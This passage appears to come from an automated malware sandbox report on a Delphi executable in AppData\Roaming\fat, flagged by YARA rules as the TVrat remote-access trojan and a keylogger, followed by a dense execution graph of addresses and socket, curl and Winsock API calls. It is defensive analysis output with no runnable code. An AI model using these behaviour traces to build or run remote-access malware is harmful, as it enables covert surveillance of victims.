                                                                                                                          MD5 hash:8002D9E5851728EB024B398CF19DE390
                                                                                                                          Has elevated privileges:true
                                                                                                                          Has administrator privileges:true
                                                                                                                          Programmed in:Borland Delphi
                                                                                                                          Yara matches:
                                                                                                                          • Rule: JoeSecurity_DelphiSystemParamCount, Description: Detected Delphi use of System.ParamCount(), Source: 0000000A.00000000.2727527393.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Author: Joe Security
                                                                                                                          • Rule: JoeSecurity_TVrat, Description: Yara detected TVrat, Source: 0000000A.00000000.2727527393.0000000000401000.00000020.00000001.01000000.0000000C.sdmp, Author: Joe Security
                                                                                                                          • Rule: JoeSecurity_Keylogger_Generic, Description: Yara detected Keylogger Generic, Source: C:\Users\user\AppData\Roaming\fat\ast.exe, Author: Joe Security
                                                                                                                          • Rule: JoeSecurity_DelphiSystemParamCount, Description: Detected Delphi use of System.ParamCount(), Source: C:\Users\user\AppData\Roaming\fat\ast.exe, Author: Joe Security
                                                                                                                          • Rule: JoeSecurity_TVrat, Description: Yara detected TVrat, Source: C:\Users\user\AppData\Roaming\fat\ast.exe, Author: Joe Security
                                                                                                                          Reputation:moderate
                                                                                                                          Has exited:false

                                                                                                                          Target ID:11
                                                                                                                          Start time:13:15:22
                                                                                                                          Start date:19/11/2024
                                                                                                                          Path:C:\Users\user\AppData\Roaming\fat\ast.exe
                                                                                                                          Wow64 process (32bit):true
                                                                                                                          Commandline:"C:\Users\user\AppData\Roaming\fat\ast.exe"
                                                                                                                          Imagebase:0x400000
                                                                                                                          File size:7'543'992 bytes
                                                                                                                          MD5 hash:8002D9E5851728EB024B398CF19DE390
                                                                                                                          Has elevated privileges:false
                                                                                                                          Has administrator privileges:false
                                                                                                                          Programmed in:Borland Delphi
                                                                                                                          Reputation:moderate
                                                                                                                          Has exited:true

                                                                                                                          Target ID:12
                                                                                                                          Start time:13:15:30
                                                                                                                          Start date:19/11/2024
                                                                                                                          Path:C:\Users\user\AppData\Roaming\fat\ast.exe
                                                                                                                          Wow64 process (32bit):true
                                                                                                                          Commandline:"C:\Users\user\AppData\Roaming\fat\ast.exe"
                                                                                                                          Imagebase:0x400000
                                                                                                                          File size:7'543'992 bytes
                                                                                                                          MD5 hash:8002D9E5851728EB024B398CF19DE390
                                                                                                                          Has elevated privileges:false
                                                                                                                          Has administrator privileges:false
                                                                                                                          Programmed in:Borland Delphi
                                                                                                                          Reputation:moderate
                                                                                                                          Has exited:true

                                                                                                                            Execution Graph

                                                                                                                            Execution Coverage:3.5%
                                                                                                                            Dynamic/Decrypted Code Coverage:0%
                                                                                                                            Signature Coverage:15.8%
                                                                                                                            Total number of Nodes:774
                                                                                                                            Total number of Limit Nodes:48
closesocket 21280->21321 21282->21269 21283->21261 21284->21261 21286 6b6cc6db 21285->21286 21287 6b6cc677 21285->21287 21375 6b6dee30 21286->21375 21289 6b6cc699 21287->21289 21290 6b6cc684 21287->21290 21323 6b6c2d20 21289->21323 21395 6b6ded60 165 API calls 21290->21395 21293 6b6cc6e3 21298 6b6cc740 21293->21298 21320 6b6cc855 21293->21320 21397 6b6eb380 106 API calls 21293->21397 21294 6b6cc690 21294->21278 21295 6b6cc6a5 21295->21286 21296 6b6cc6ae 21295->21296 21296->21320 21396 6b6cd2d0 78 API calls 21296->21396 21299 6b6cc894 21298->21299 21300 6b6cc780 21298->21300 21298->21320 21405 6b6ff7a0 76 API calls 21299->21405 21302 6b6cc789 21300->21302 21303 6b6cc7e3 21300->21303 21398 6b6ccf60 107 API calls 21302->21398 21315 6b6cc7ec 21303->21315 21401 6b6c8160 47 API calls 21303->21401 21305 6b6cc6d2 21305->21278 21308 6b6cc793 21310 6b6cc7c9 21308->21310 21399 6b6ccb00 80 API calls __fassign 21308->21399 21310->21278 21311 6b6cc84e 21311->21320 21404 6b6cc8c0 106 API calls 21311->21404 21314 6b6cc80c 21314->21311 21314->21315 21317 6b6cc83e 21314->21317 21315->21311 21403 6b6cd360 195 API calls 21315->21403 21316 6b6cc7af 21316->21310 21400 6b6ccec0 86 API calls 21316->21400 21402 6b6cd360 195 API calls 21317->21402 21320->21278 21321->21282 21322->21279 21324 6b6c2d6a 21323->21324 21325 6b6c2d80 21323->21325 21327 6b70db71 __fassign 5 API calls 21324->21327 21326 6b6fe5d0 2 API calls 21325->21326 21331 6b6c2d8c 21326->21331 21328 6b6c2d7c 21327->21328 21328->21295 21329 6b6c32c4 21432 6b6f05d0 74 API calls __fassign 21329->21432 21331->21329 21333 6b6c2e4c 21331->21333 21332 6b6c32cf 21335 6b70db71 __fassign 5 API calls 21332->21335 21334 6b6c2e55 21333->21334 21374 6b6c2e9a __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z 21333->21374 21336 6b6c3f40 204 API calls 21334->21336 21337 6b6c32e4 21335->21337 21340 6b6c2e68 21336->21340 21337->21295 21338 6b6f03a0 16 API calls 21338->21374 21339 6b6c2e84 21341 6b70db71 __fassign 5 API calls 21339->21341 21340->21339 
21342 6b6c4060 92 API calls 21340->21342 21343 6b6c2e96 21341->21343 21342->21339 21343->21295 21344 6b6c32af 21346 6b70db71 __fassign 5 API calls 21344->21346 21345 6b6c3130 21345->21344 21428 6b6c46a0 207 API calls 21345->21428 21349 6b6c32c0 21346->21349 21347 6b6c4740 SleepEx getsockopt WSAGetLastError 21347->21374 21349->21295 21350 6b6c3160 21350->21324 21359 6b6c316d 21350->21359 21351 6b6c3185 21354 6b6c31dd 21351->21354 21429 6b6c28e0 closesocket 21351->21429 21352 6b6f06b0 74 API calls 21352->21374 21353 6b6c3025 WSASetLastError 21353->21374 21406 6b6c3f40 21354->21406 21358 6b6c31f9 21358->21332 21363 6b6c320c 21358->21363 21430 6b6fa0e0 53 API calls 3 library calls 21359->21430 21361 6b6c326a 21431 6b6f05d0 74 API calls __fassign 21361->21431 21418 6b6c4060 21363->21418 21364 6b6c46a0 207 API calls 21364->21374 21368 6b6c3288 21368->21344 21370 6b6c3297 21368->21370 21369 6b70db71 __fassign 5 API calls 21371 6b6c3226 21369->21371 21372 6b70db71 __fassign 5 API calls 21370->21372 21371->21295 21373 6b6c32ab 21372->21373 21373->21295 21374->21338 21374->21345 21374->21347 21374->21351 21374->21352 21374->21353 21374->21364 21426 6b6d8450 21 API calls 21374->21426 21427 6b6fa0e0 53 API calls 3 library calls 21374->21427 21376 6b6dee5d 21375->21376 21385 6b6deea1 __fassign 21375->21385 21376->21385 21500 6b70cee0 21376->21500 21378 6b70db71 __fassign 5 API calls 21380 6b6df063 21378->21380 21379 6b6dee72 21381 6b6dee7f 21379->21381 21379->21385 21380->21293 21382 6b70db71 __fassign 5 API calls 21381->21382 21383 6b6dee9d 21382->21383 21383->21293 21386 6b6f06b0 74 API calls 21385->21386 21390 6b6def8e 21385->21390 21393 6b6df035 21385->21393 21394 6b6def7a 21385->21394 21386->21390 21387 6b6df022 21389 6b70db71 __fassign 5 API calls 21387->21389 21388 6b6defd5 21391 6b6f06b0 74 API calls 21388->21391 21388->21394 21392 6b6df031 21389->21392 21508 6b6de330 165 API calls ___from_strstr_to_strchr 21390->21508 21391->21394 21392->21293 21393->21378 21394->21387 
21394->21393 21395->21294 21396->21305 21397->21298 21398->21308 21399->21316 21400->21310 21401->21314 21402->21311 21403->21311 21404->21310 21405->21320 21407 6b6c403b 21406->21407 21408 6b6c3f54 21406->21408 21407->21358 21409 6b6c3fcd 21408->21409 21410 6b6c4023 21408->21410 21412 6b6c3fd4 21409->21412 21413 6b6c3ff1 21409->21413 21435 6b6f05d0 74 API calls __fassign 21410->21435 21433 6b6f75d0 203 API calls __fassign 21412->21433 21434 6b6f6f40 191 API calls __fassign 21413->21434 21415 6b6c402f 21415->21358 21417 6b6c3fec 21417->21358 21419 6b6c408d 21418->21419 21420 6b6c4080 21418->21420 21436 6b6c36a0 21419->21436 21486 6b6ecc20 QueryPerformanceCounter GetTickCount 21420->21486 21423 6b6c409d 21487 6b6d28a0 74 API calls 21423->21487 21425 6b6c3214 21425->21369 21426->21374 21427->21374 21428->21350 21429->21354 21430->21361 21431->21368 21432->21332 21433->21417 21434->21417 21435->21415 21437 6b6c38bf 21436->21437 21438 6b6c36c6 21436->21438 21439 6b70db71 __fassign 5 API calls 21437->21439 21438->21437 21441 6b6c36e0 getpeername 21438->21441 21440 6b6c3999 21439->21440 21440->21423 21442 6b6c3708 WSAGetLastError 21441->21442 21443 6b6c3743 __fassign 21441->21443 21488 6b6fa0e0 53 API calls 3 library calls 21442->21488 21446 6b6c3760 getsockname 21443->21446 21445 6b6c3722 21489 6b6f05d0 74 API calls __fassign 21445->21489 21448 6b6c377c WSAGetLastError 21446->21448 21449 6b6c37b7 21446->21449 21490 6b6fa0e0 53 API calls 3 library calls 21448->21490 21450 6b6c2840 23 API calls 21449->21450 21453 6b6c37d7 21450->21453 21451 6b6c372f 21454 6b70db71 __fassign 5 API calls 21451->21454 21456 6b6c37de 21453->21456 21457 6b6c3820 21453->21457 21458 6b6c373f 21454->21458 21455 6b6c3796 21491 6b6f05d0 74 API calls __fassign 21455->21491 21492 6b711f49 14 API calls __dosmaperr 21456->21492 21460 6b6c2840 23 API calls 21457->21460 21458->21423 21464 6b6c3876 21460->21464 21462 6b6c37a3 21463 6b70db71 __fassign 5 API calls 21462->21463 21466 6b6c37b3 21463->21466 
21464->21437 21467 6b6c387d 21464->21467 21465 6b6c37e3 21493 6b711f49 14 API calls __dosmaperr 21465->21493 21466->21423 21496 6b711f49 14 API calls __dosmaperr 21467->21496 21470 6b6c37ea 21494 6b6fa0e0 53 API calls 3 library calls 21470->21494 21471 6b6c3882 21497 6b711f49 14 API calls __dosmaperr 21471->21497 21474 6b6c37fe 21495 6b6f05d0 74 API calls __fassign 21474->21495 21475 6b6c3889 21498 6b6fa0e0 53 API calls 3 library calls 21475->21498 21478 6b6c380c 21480 6b70db71 __fassign 5 API calls 21478->21480 21479 6b6c389d 21499 6b6f05d0 74 API calls __fassign 21479->21499 21482 6b6c381c 21480->21482 21482->21423 21483 6b6c38ab 21484 6b70db71 __fassign 5 API calls 21483->21484 21485 6b6c38bb 21484->21485 21485->21423 21486->21419 21487->21425 21488->21445 21489->21451 21490->21455 21491->21462 21492->21465 21493->21470 21494->21474 21495->21478 21496->21471 21497->21475 21498->21479 21499->21483 21501 6b70cef8 21500->21501 21502 6b70cf2f 21501->21502 21504 6b70cf85 21501->21504 21506 6b70cf36 21501->21506 21510 6b6f05d0 74 API calls __fassign 21502->21510 21504->21379 21505 6b70cf6d 21505->21379 21506->21505 21509 6b6ecc20 QueryPerformanceCounter GetTickCount 21506->21509 21508->21388 21509->21505 21510->21504 21576 6b6c4850 74 API calls 21577 6b6cac50 30 API calls 21578 6b6d0d50 97 API calls 21580 6b6cbf20 110 API calls 21581 6b6ca720 curl_easy_escape 21582 6b6c8320 88 API calls 21603 6b6c9ba0 curl_slist_free_all curl_slist_free_all curl_maprintf curl_getenv 21604 6b6caca0 99 API calls 21605 6b6cc4a0 106 API calls 21607 6b6e7ea0 138 API calls 21007 6b6f0c20 21010 6b6f09f0 21007->21010 21009 6b6f0c45 21011 6b6f0b1a send 21010->21011 21012 6b6f0a54 21010->21012 21013 6b6f0b3e WSAGetLastError 21011->21013 21024 6b6f0b8e 21011->21024 21012->21011 21033 6b6f03a0 21012->21033 21015 6b6f0b4e 21013->21015 21016 6b6f0b69 21013->21016 21014 6b70db71 __fassign 5 API calls 21017 6b6f0bb4 21014->21017 21019 6b70db71 __fassign 5 API calls 21015->21019 21045 6b6fa0e0 53 API 
calls 3 library calls 21016->21045 21017->21009 21021 6b6f0b65 21019->21021 21021->21009 21022 6b6f0b7b 21046 6b6f05d0 74 API calls __fassign 21022->21046 21024->21014 21025 6b6f0abe 21026 6b6f0af5 recv 21025->21026 21027 6b6f0b13 21025->21027 21026->21011 21029 6b6f0b0e 21026->21029 21027->21011 21028 6b6f0a85 21028->21011 21028->21025 21030 6b6f0ad1 21028->21030 21029->21011 21031 6b70db71 __fassign 5 API calls 21030->21031 21032 6b6f0ae7 21031->21032 21032->21009 21034 6b6f03c0 21033->21034 21036 6b6f03e7 21033->21036 21035 6b6f03c9 21034->21035 21034->21036 21080 6b6f04d0 WSASetLastError Sleep 21035->21080 21047 6b6efef0 21036->21047 21039 6b6f03d4 21040 6b70db71 __fassign 5 API calls 21039->21040 21041 6b6f03e3 21040->21041 21041->21028 21042 6b70db71 __fassign 5 API calls 21043 6b6f04c0 21042->21043 21043->21028 21044 6b6f0431 21044->21042 21045->21022 21046->21024 21048 6b6eff10 21047->21048 21053 6b6eff2b 21047->21053 21048->21053 21065 6b6eff69 21048->21065 21049 6b6f0384 21051 6b70db71 __fassign 5 API calls 21049->21051 21050 6b6f0369 21054 6b6f037d Sleep 21050->21054 21055 6b6f0390 21051->21055 21052 6b6eff4d WSASetLastError 21057 6b70db71 __fassign 5 API calls 21052->21057 21053->21049 21053->21050 21053->21052 21056 6b6f0363 21053->21056 21054->21049 21055->21044 21056->21050 21056->21054 21058 6b6eff65 21057->21058 21058->21044 21059 6b6f00d9 21069 6b6f00e9 21059->21069 21073 6b6f0164 __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z 21059->21073 21060 6b6f0100 WSASetLastError 21061 6b6f010e 21060->21061 21062 6b70db71 __fassign 5 API calls 21061->21062 21063 6b6f011b 21062->21063 21063->21044 21064 6b6f0237 select 21066 6b6f00fb 21064->21066 21065->21059 21065->21060 21066->21061 21079 6b6f027f 21066->21079 21067 6b6f0142 21070 6b6f0156 Sleep 21067->21070 21068 6b6f0129 WSASetLastError 21068->21066 21069->21066 21069->21067 21069->21068 21071 6b6f013c 21069->21071 21070->21066 21071->21067 21071->21070 21072 6b6f02a1 __WSAFDIsSet 21075 6b6f02df 
__WSAFDIsSet 21072->21075 21072->21079 21073->21064 21074 6b6f0350 21076 6b70db71 __fassign 5 API calls 21074->21076 21077 6b6f02fc __WSAFDIsSet 21075->21077 21075->21079 21078 6b6f035f 21076->21078 21077->21079 21078->21044 21079->21072 21079->21074 21079->21075 21079->21077 21080->21039 21226 6b6c9e30 21227 6b6c9e46 curl_multi_setopt curl_multi_add_handle 21226->21227 21229 6b6c9ef1 21227->21229 21230 6b6c9ef7 curl_multi_poll 21229->21230 21231 6b6c9f50 curl_multi_remove_handle 21229->21231 21230->21231 21610 6b6c71b0 8 API calls __fassign 20693 6b6ca080 20694 6b6ca097 20693->20694 20695 6b6ca09e 20694->20695 20698 6b6ca230 20694->20698 20697 6b6ca0b6 20699 6b6ca23b 20698->20699 20700 6b6ca241 20698->20700 20699->20697 20701 6b6ca24a 20700->20701 20705 6b6ca260 20700->20705 20708 6b6f05d0 74 API calls __fassign 20701->20708 20703 6b6ca255 20703->20697 20704 6b6ca28c 20704->20697 20705->20704 20709 6b6f05d0 74 API calls __fassign 20705->20709 20707 6b6ca281 20707->20697 20708->20703 20709->20707 20710 6b6cde80 20711 6b6cdeba 20710->20711 20712 6b6cdfdd 20711->20712 20718 6b6cded5 ___from_strstr_to_strchr 20711->20718 20714 6b6ce384 20712->20714 20715 6b6ce3a2 20712->20715 20730 6b6cdff5 20712->20730 20713 6b6ce388 20853 6b6cd2d0 78 API calls 20713->20853 20714->20713 20714->20715 20854 6b6f05d0 74 API calls __fassign 20715->20854 20717 6b6ce083 20807 6b6f05d0 74 API calls __fassign 20717->20807 20718->20713 20721 6b6cdfca 20718->20721 20796 6b6c6d50 47 API calls 20718->20796 20719 6b6ce38e 20723 6b70db71 __fassign 5 API calls 20719->20723 20805 6b6f05d0 74 API calls __fassign 20721->20805 20728 6b6ce39e 20723->20728 20724 6b6cdf6b 20732 6b70db71 __fassign 5 API calls 20724->20732 20727 6b6ce08e 20731 6b70db71 __fassign 5 API calls 20727->20731 20730->20717 20733 6b6ce0a7 20730->20733 20806 6b6c6d50 47 API calls 20730->20806 20734 6b6ce0a3 20731->20734 20735 6b6ce3c3 20732->20735 20733->20717 20740 6b6ce0fb 20733->20740 20736 6b6cdf26 20736->20721 20737 6b6cdf60 
20736->20737 20738 6b6cdf73 20736->20738 20797 6b6f05d0 74 API calls __fassign 20737->20797 20738->20721 20752 6b6cdf77 20738->20752 20741 6b6ce12b curl_maprintf 20740->20741 20742 6b6ce104 20740->20742 20741->20752 20808 6b6f06b0 20742->20808 20744 6b6cdfb4 20798 6b70db71 20744->20798 20746 6b6ce16d 20818 6b6d84a0 20746->20818 20747 6b6ce201 20749 6b6d84a0 166 API calls 20747->20749 20748 6b6cdfc6 20750 6b6ce21e 20749->20750 20753 6b6ce233 20750->20753 20850 6b6c1520 88 API calls 20750->20850 20752->20744 20752->20746 20752->20747 20756 6b6ce24d 20753->20756 20757 6b6ce27b 20753->20757 20755 6b6ce1a0 20758 6b6ce1b5 20755->20758 20848 6b6c1520 88 API calls 20755->20848 20851 6b6f05d0 74 API calls __fassign 20756->20851 20783 6b6c2a60 20757->20783 20758->20757 20763 6b6ce1d3 20758->20763 20762 6b6ce262 20765 6b70db71 __fassign 5 API calls 20762->20765 20849 6b6f05d0 74 API calls __fassign 20763->20849 20764 6b6ce289 20767 6b6ce2ca 20764->20767 20774 6b6ce292 20764->20774 20768 6b6ce277 20765->20768 20779 6b6ce310 20767->20779 20852 6b6d8450 21 API calls 20767->20852 20769 6b6ce1e8 20771 6b70db71 __fassign 5 API calls 20769->20771 20773 6b6ce1fd 20771->20773 20772 6b6ce2f2 20777 6b6f06b0 74 API calls 20772->20777 20774->20713 20775 6b6ce2b7 20774->20775 20776 6b70db71 __fassign 5 API calls 20775->20776 20778 6b6ce2c6 20776->20778 20777->20779 20779->20744 20780 6b6ce360 20779->20780 20781 6b70db71 __fassign 5 API calls 20780->20781 20782 6b6ce380 20781->20782 20784 6b6c2a9d 20783->20784 20855 6b6fe5d0 20784->20855 20786 6b6c2c83 20948 6b6f05d0 74 API calls __fassign 20786->20948 20787 6b6c2ac8 20787->20786 20795 6b6c2b15 __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z 20787->20795 20789 6b6c2c90 20789->20764 20790 6b6c2c55 20793 6b6c2c59 20790->20793 20947 6b6e69d0 76 API calls __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z 20790->20947 20792 6b6c2c77 20792->20764 20793->20764 20795->20790 20859 6b6c40c0 20795->20859 20796->20736 20797->20724 20799 6b70db7a 20798->20799 
20800 6b70db7c IsProcessorFeaturePresent 20798->20800 20799->20748 20802 6b70dc76 20800->20802 20980 6b70dc3a SetUnhandledExceptionFilter UnhandledExceptionFilter GetCurrentProcess TerminateProcess 20802->20980 20804 6b70dd59 20804->20748 20805->20724 20806->20730 20807->20727 20809 6b6f06cf 20808->20809 20817 6b6f0759 20808->20817 20811 6b6f06dc curl_mvsnprintf 20809->20811 20809->20817 20810 6b70db71 __fassign 5 API calls 20812 6b6f0767 20810->20812 20813 6b6f0737 20811->20813 20814 6b6f06fe curl_msnprintf 20811->20814 20812->20752 20981 6b6f0550 72 API calls 20813->20981 20814->20813 20817->20810 20819 6b6d84e7 20818->20819 20982 6b6d8840 20819->20982 20821 6b6d84ff 20822 6b6f06b0 74 API calls 20821->20822 20827 6b6d8515 20821->20827 20822->20827 20823 6b6d8589 inet_pton 20825 6b6d85b9 inet_pton 20823->20825 20826 6b6d859a 20823->20826 20824 6b70db71 __fassign 5 API calls 20828 6b6d8679 20824->20828 20830 6b6d85ca 20825->20830 20835 6b6d85d9 20825->20835 20998 6b6c6fb0 htons __fassign 20826->20998 20827->20823 20834 6b6d86cf 20827->20834 20839 6b6d8656 20827->20839 20828->20755 20999 6b6c6fb0 htons __fassign 20830->20999 20831 6b6d85a9 20831->20825 20833 6b6d867d 20831->20833 21003 6b6d7ae0 78 API calls __fassign 20833->21003 20836 6b70db71 __fassign 5 API calls 20834->20836 20835->20833 20835->20834 20841 6b6d8617 20835->20841 21000 6b6edb40 147 API calls __fassign 20835->21000 20838 6b6d86df 20836->20838 20838->20755 20839->20824 20841->20833 20842 6b6d8630 20841->20842 20842->20839 20843 6b6d864a 20842->20843 20844 6b6d8643 20842->20844 21002 6b6c1380 90 API calls 20843->21002 21001 6b6edcd0 112 API calls __fassign 20844->21001 20847 6b6d8648 20847->20834 20847->20839 20848->20758 20849->20769 20850->20753 20851->20762 20852->20772 20853->20719 20854->20724 20856 6b6fe642 GetTickCount 20855->20856 20857 6b6fe5e0 QueryPerformanceCounter 20855->20857 20856->20787 20858 6b6fe603 __alldvrm __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z 20857->20858 20858->20787 
20860 6b6c4138 __fassign 20859->20860 20861 6b6c41af socket 20860->20861 20862 6b6c417c 20860->20862 20861->20862 20863 6b6c4512 20862->20863 20864 6b6c41e3 20862->20864 20962 6b6ea660 ioctlsocket 20862->20962 20867 6b70db71 __fassign 5 API calls 20863->20867 20949 6b6c2840 20864->20949 20868 6b6c4524 20867->20868 20868->20795 20869 6b6c420b 20870 6b6c4267 20869->20870 20871 6b6c4212 20869->20871 20872 6b6f06b0 74 API calls 20870->20872 20963 6b711f49 14 API calls __dosmaperr 20871->20963 20874 6b6c427c 20872->20874 20877 6b6c42fb 20874->20877 20879 6b6c42a8 setsockopt 20874->20879 20875 6b6c4217 20964 6b711f49 14 API calls __dosmaperr 20875->20964 20889 6b6c433a 20877->20889 20969 6b704f30 11 API calls __fassign 20877->20969 20878 6b6c421e 20965 6b6fa0e0 53 API calls 3 library calls 20878->20965 20879->20877 20881 6b6c42d2 WSAGetLastError 20879->20881 20968 6b6fa0e0 53 API calls 3 library calls 20881->20968 20882 6b6c4232 20966 6b6f05d0 74 API calls __fassign 20882->20966 20884 6b6c435e getsockopt 20890 6b6c438f setsockopt 20884->20890 20891 6b6c4381 20884->20891 20885 6b6c4341 20895 6b6c43c3 setsockopt 20885->20895 20903 6b6c43f4 20885->20903 20888 6b6c4245 20967 6b6c28e0 closesocket 20888->20967 20889->20884 20889->20885 20890->20885 20891->20885 20891->20890 20892 6b6c42ea 20896 6b6f06b0 74 API calls 20892->20896 20894 6b6c44bf 20898 6b6c44d6 20894->20898 20902 6b6c454c 20894->20902 20899 6b6c43e8 20895->20899 20906 6b6c43fc 20895->20906 20896->20877 20897 6b6c4251 20901 6b70db71 __fassign 5 API calls 20897->20901 20970 6b6c39a0 187 API calls __fassign 20898->20970 20900 6b6f06b0 74 API calls 20899->20900 20900->20903 20904 6b6c4263 20901->20904 20961 6b6ea660 ioctlsocket 20902->20961 20903->20894 20918 6b6c452c 20903->20918 20904->20795 20909 6b6c442e WSAIoctl 20906->20909 20908 6b6c4554 20911 6b6fe5d0 2 API calls 20908->20911 20909->20903 20912 6b6c446b WSAGetLastError 20909->20912 20910 6b6c44f0 20910->20902 20913 6b6c44fd 20910->20913 20914 6b6c4560 
20911->20914 20915 6b6f06b0 74 API calls 20912->20915 20971 6b6c28e0 closesocket 20913->20971 20917 6b6c459e 20914->20917 20973 6b6e69d0 76 API calls __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z 20914->20973 20915->20903 20919 6b6c467b 20917->20919 20923 6b6c45bb 20917->20923 20972 6b6c28e0 closesocket 20918->20972 20924 6b70db71 __fassign 5 API calls 20919->20924 20920 6b6c4504 20920->20863 20927 6b6c4604 WSAGetLastError 20923->20927 20928 6b6c45c4 connect 20923->20928 20929 6b6c4692 20924->20929 20925 6b6c458a 20974 6b6e69d0 76 API calls __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z 20925->20974 20926 6b6c4533 20931 6b70db71 __fassign 5 API calls 20926->20931 20933 6b6c4615 20927->20933 20934 6b6c4660 20927->20934 20928->20927 20932 6b6c45dd 20928->20932 20929->20795 20936 6b6c4548 20931->20936 20932->20863 20937 6b6c45eb 20932->20937 20933->20934 20938 6b6c4623 20933->20938 20935 6b70db71 __fassign 5 API calls 20934->20935 20939 6b6c4677 20935->20939 20936->20795 20940 6b70db71 __fassign 5 API calls 20937->20940 20975 6b6fa0e0 53 API calls 3 library calls 20938->20975 20939->20795 20942 6b6c4600 20940->20942 20942->20795 20943 6b6c4635 20944 6b6f06b0 74 API calls 20943->20944 20945 6b6c4645 20944->20945 20976 6b6c28e0 closesocket 20945->20976 20947->20792 20948->20789 20950 6b6c2886 20949->20950 20951 6b6c2853 20949->20951 20978 6b6e1080 21 API calls __dosmaperr 20950->20978 20953 6b6c28b4 20951->20953 20977 6b6e1080 21 API calls __dosmaperr 20951->20977 20979 6b711f49 14 API calls __dosmaperr 20953->20979 20954 6b6c2894 20954->20953 20958 6b6c289b htons 20954->20958 20957 6b6c2866 20957->20953 20960 6b6c286d htons 20957->20960 20958->20869 20959 6b6c28c5 20959->20869 20960->20869 20961->20908 20962->20864 20963->20875 20964->20878 20965->20882 20966->20888 20967->20897 20968->20892 20969->20889 20970->20910 20971->20920 20972->20926 20973->20925 20974->20917 20975->20943 20976->20863 20977->20957 20978->20954 20979->20959 20980->20804 20981->20817 21004 6b6d87e0 
48 API calls 20982->21004 20984 6b6d8997 20987 6b70db71 __fassign 5 API calls 20984->20987 20985 6b6d8873 20985->20984 20991 6b6d88e0 20985->20991 21005 6b7194c5 47 API calls 20985->21005 20990 6b6d89a6 20987->20990 20989 6b6d88b8 curl_msnprintf 20989->20991 20990->20821 20991->20984 20991->20991 21006 6b716edc 26 API calls 20991->21006 20992 6b6d8922 20992->20984 20993 6b6d8966 20992->20993 20994 6b6f06b0 74 API calls 20993->20994 20995 6b6d8971 20994->20995 20996 6b70db71 __fassign 5 API calls 20995->20996 20997 6b6d8993 20996->20997 20997->20821 20998->20831 20999->20835 21000->20841 21001->20847 21002->20847 21003->20839 21004->20985 21005->20989 21006->20992 21583 6b6c2000 QueryPerformanceCounter GetTickCount 21584 6b6c9c00 78 API calls __fassign 21585 6b6cbc00 curl_formfree 21614 6b6c7e80 11 API calls 21615 6b6e3980 curl_slist_free_all 21587 6b6ce710 195 API calls 21588 6b6ca610 47 API calls 21616 6b6c9190 79 API calls ___from_strstr_to_strchr 21617 6b6ca190 31 API calls 21618 6b6c9890 101 API calls __fassign 21589 6b6d6310 GetEnvironmentVariableA 21511 6b6e7990 21512 6b6e79b4 21511->21512 21514 6b6e799f 21511->21514 21514->21512 21516 6b6e7a25 21514->21516 21528 6b6e83d0 138 API calls __fassign 21514->21528 21520 6b6c1e00 21516->21520 21517 6b6e7a2f 21518 6b6e7a5d WSACloseEvent 21517->21518 21519 6b6e7a73 21518->21519 21521 6b6c1fcc 21520->21521 21527 6b6c1e2b 21520->21527 21522 6b70db71 __fassign 5 API calls 21521->21522 21523 6b6c1fda 21522->21523 21523->21517 21524 6b6c1f9d 21524->21521 21525 6b6d1650 106 API calls 21524->21525 21525->21521 21527->21524 21529 6b6d1bd0 21527->21529 21528->21514 21530 6b6d1be4 21529->21530 21531 6b6f06b0 74 API calls 21530->21531 21540 6b6d1cc7 21530->21540 21532 6b6d1c5c 21531->21532 21543 6b6c1000 21532->21543 21534 6b6d1c62 21535 6b6d1c88 21534->21535 21558 6b6c28e0 closesocket 21534->21558 21537 6b6d1c9d 21535->21537 21559 6b6c28e0 closesocket 21535->21559 21539 6b6d1cb2 21537->21539 21560 6b6c28e0 closesocket 
21537->21560 21539->21540 21561 6b6c28e0 closesocket 21539->21561 21540->21527 21544 6b6c15c0 21543->21544 21545 6b6c1649 21544->21545 21546 6b6c15d0 EnterCriticalSection LeaveCriticalSection 21544->21546 21545->21534 21547 6b6c15fd 21546->21547 21548 6b6c1609 21546->21548 21562 6b6c9150 CloseHandle 21547->21562 21549 6b6c160e 21548->21549 21550 6b6c1617 21548->21550 21563 6b6c9160 WaitForSingleObjectEx CloseHandle 21549->21563 21564 6b6c1670 DeleteCriticalSection closesocket __fassign 21550->21564 21552 6b6c1604 21556 6b6c1620 21552->21556 21555 6b6c1614 21555->21550 21557 6b6c1641 closesocket 21556->21557 21557->21545 21558->21535 21559->21537 21560->21539 21561->21540 21562->21552 21563->21555 21564->21556

                                                                                                                            Control-flow Graph

                                                                                                                            control_flow_graph 134 6b6f6d50-6b6f6d87 socket 135 6b6f6d8d-6b6f6dd6 htonl setsockopt 134->135 136 6b6f6f21-6b6f6f34 call 6b70db71 134->136 137 6b6f6f0f-6b6f6f1f closesocket * 3 135->137 138 6b6f6ddc-6b6f6dec bind 135->138 137->136 138->137 140 6b6f6df2-6b6f6e04 getsockname 138->140 140->137 142 6b6f6e0a-6b6f6e16 listen 140->142 142->137 143 6b6f6e1c-6b6f6e29 socket 142->143 143->137 144 6b6f6e2f-6b6f6e3f connect 143->144 144->137 145 6b6f6e45-6b6f6e56 accept 144->145 145->137 146 6b6f6e5c-6b6f6e73 curl_msnprintf 145->146 147 6b6f6e76-6b6f6e7b 146->147 147->147 148 6b6f6e7d-6b6f6e90 send 147->148 148->137 149 6b6f6e92-6b6f6ea5 recv 148->149 149->137 150 6b6f6ea7-6b6f6eb0 149->150 151 6b6f6ec3-6b6f6ec6 150->151 152 6b6f6eb2-6b6f6eb6 150->152 153 6b6f6ec8-6b6f6ecc 151->153 155 6b6f6ef5-6b6f6f0e closesocket call 6b70db71 151->155 152->153 154 6b6f6eb8-6b6f6ec1 152->154 153->137 156 6b6f6ece-6b6f6ed1 153->156 154->151 154->152 156->155 158 6b6f6ed3-6b6f6ed9 156->158 158->137 160 6b6f6edb-6b6f6ede 158->160 160->155 161 6b6f6ee0-6b6f6ee6 160->161 161->137 162 6b6f6ee8-6b6f6eeb 161->162 162->155 163 6b6f6eed-6b6f6ef3 162->163 163->137 163->155
                                                                                                                            APIs
                                                                                                                            • socket.WS2_32(00000002,00000001,00000006), ref: 6B6F6D80
                                                                                                                            • htonl.WS2_32(7F000001), ref: 6B6F6DA3
